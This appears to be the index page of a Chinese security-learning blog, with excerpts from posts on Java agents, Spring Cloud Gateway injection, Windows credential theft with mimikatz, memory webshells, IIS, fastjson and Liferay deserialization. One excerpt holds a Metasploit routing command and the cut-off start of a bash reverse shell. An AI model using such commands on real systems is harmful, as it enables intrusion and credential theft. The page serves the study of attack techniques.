2022-04-04
Java agent学习
AgentJava Agent是jdk1.5以后引入的在字节码这个层面对类和方法进行修改的技术,能够在不影响编译的情况下,修改字节码。可以理解spring的aop技术。
Java agent的实现方式主要有两种:
· premain方法,在
2022-03-29
Spring Cloud Gateway表达式注入
漏洞复现环境搭建直接使用vulhub(https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947) 中的项目,为演示方便将项目从docker中的spring-clou
2022-03-19
Windows安全认证入门
Sam文件sam文件存放在%SystemRoot%\system32\config\sam 是系统Windows的账户的数据库文件。用户在登录时系统会自动读取sam中的认证对比,认证成功后登录
NTLMNTLM是NT LAN Manager
2022-03-13
Windows下密码获取(leaning)
mimikatz简单使用mimikatz获取Windows账号明文密码mimikatz是法国的安全研究员开发的针对Windows各种环境下密码读取工具同时具有zerologon、约束委派攻击的作用,此本文主要讲mimikatz密码读取简单利
2022-03-12
内存马学习(一)
前言此次学习仅为内存马的初步认识,尤其是java内存马还需更深入研究
内存马概述Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客
2022-03-12
IIS漏洞总结
IIS漏洞总结IIS put影响范围:iis6.0
漏洞环境搭建:在winserver2003中安装完IIS6后打开IIS管理器保证web服务扩展中的Active Server Pages和WebDAV是允许状态
然后将主目录设置为可写入
2022-03-12
fastjson漏洞-JdbcRowSetImpl链
fastjson漏洞-JdbcRowSetImpl链(一)fastjson概述fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到J
2022-03-12
常用记不住的命令(补充ing)
Metasploit生成木马meterpreter配置静态路由
run autoroute -s 10.xx.xx.xx/24
Linux反弹shellbash:
bash -i >& /dev/
2022-03-12
Liferay Portal反序列化
漏洞概述Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用。该项目使用了Web、EJB以及JMS等技术,特别是其前台界面部分使用Struts 框架技术,基于XML的portlet配置文件
2022-03-12